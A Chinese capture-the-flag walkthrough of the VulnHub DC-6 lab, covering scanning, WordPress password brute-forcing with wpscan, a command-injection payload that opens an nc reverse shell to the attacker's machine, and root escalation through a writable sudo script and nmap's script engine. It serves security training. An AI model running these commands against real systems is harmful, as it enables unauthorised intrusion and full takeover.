0X01 环境部署

1.下载地址

https://www.vulnhub.com/entry/dc-6,315/

安装好并将网络置为NET模式

kali net模式
DC-6 net模式

0X02 信息收集

1.主机发现

arpscan -l

kali  192.168.190.128

DC-6  192.168.190.134

2.端口收集

nmap -sS 192.168.190.134

发现存在80端口，可以进行查看，直接查看跳转到了http://wordy/

与DC-2问题类似需要修改自己本地的host文件

192.168.190.134 wordy

访问成功

3.目录扫描

python3 dirsearch.py -u http://192.168.190.134/

成功找到后台登陆页面

http://wordy/wp-login.php

4.查看网站配置

wordpress cms

0X03 Getshell

1.漏洞发现

根据已知cms，可以进行搜索历史漏洞或者去登录到后台进行getshell
目前已知后台地址，可以进行爆破，爆破之前尝试弱口令：admin/admin 另一个账号采用admin1

经过测试，admin账户是存在的只不过密码不对，而admin1此账户不存在，所以两次回显页面不同
针对wordpress cms 可以利用kali自带的wpscan进行爆破密码
wpscan --url http://wordy -e u  # 爆破对应网站有多少个用户

经过测试五个用户，将此五个用户写入到一个user.txt 文档中
admin  graham  sarah  mark  jens

密码可以利用kali自带的密码文档

位置在/usr/share/wordlists/rockyou.txt.gz
cd /usr/share/wordlists
cp rockyou.txt /home/kali/rockyou.txt
ls 

再次利用wpscan进行爆破
wpscan --url http://wordy -P rockyou.txt -U user.txt

爆破出来一个用户的账号和密码，尝试登陆

mark/helpdesk01

登录成功

经过检查找到一个可以利用的点

2.漏洞利用

进行抓包测试

可以看到可以执行命令，所以进行反弹shell

3.反弹shell

kali 开启监听
nc -lvnp 5678

在已经抓取的包中进行修改

qq.com|nc -e /bin/bash 192.168.190.128 5678

进行交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

0X04 提权

1.当前权限

whoami    # www-data

首先查看mark用户下的文件
cd /home
ls 
cd mark
ls 
cd stuff
ls 
cat things-to-do.txt

得到了另一个用户的账号密码

graham/GSo7isUM1D4

尝试登陆网站，结果登录失败

端口扫描时，有个22端口可以尝试ssh登录

ssh graham@192.168.190.134

2.常用提权

sudo -l

出现jens免登录的提示

cd ..
cd jens
ls 
cat backups.sh

3.漏洞提权

进行查看之后可以看到是有两条命令，可以再写入一个shell的命令

echo "/bin/bash" >> backups.sh

然后以管理员身份来运行

sudo -u jens ./backups.sh
sudo -l

可以看到jens又可以以管理员身份运行nmap，所以考虑到可以利用nmap进行提权
4.开始提权

写入一个shell的脚本文件，写入的命令由nmap来执行

echo 'os.execute("/bin/bash")' >> shell
nmap执行getshell的脚本命令

sudo nmap --script=shell

提权成功，切换到root目录下进行查看

cd root
ls 
cat theflag.txt

0X05 总结

1.首先收集信息，真实ip，端口，网站目录，网站部署部件等
2.利用已知cms进行查找后台地址
3.利用wpscan进行爆破用户和密码
4.利用后台进行getshell
5.利用每个用户家目录下的文件进行达到最后的提权效果
6.提权成功查看flag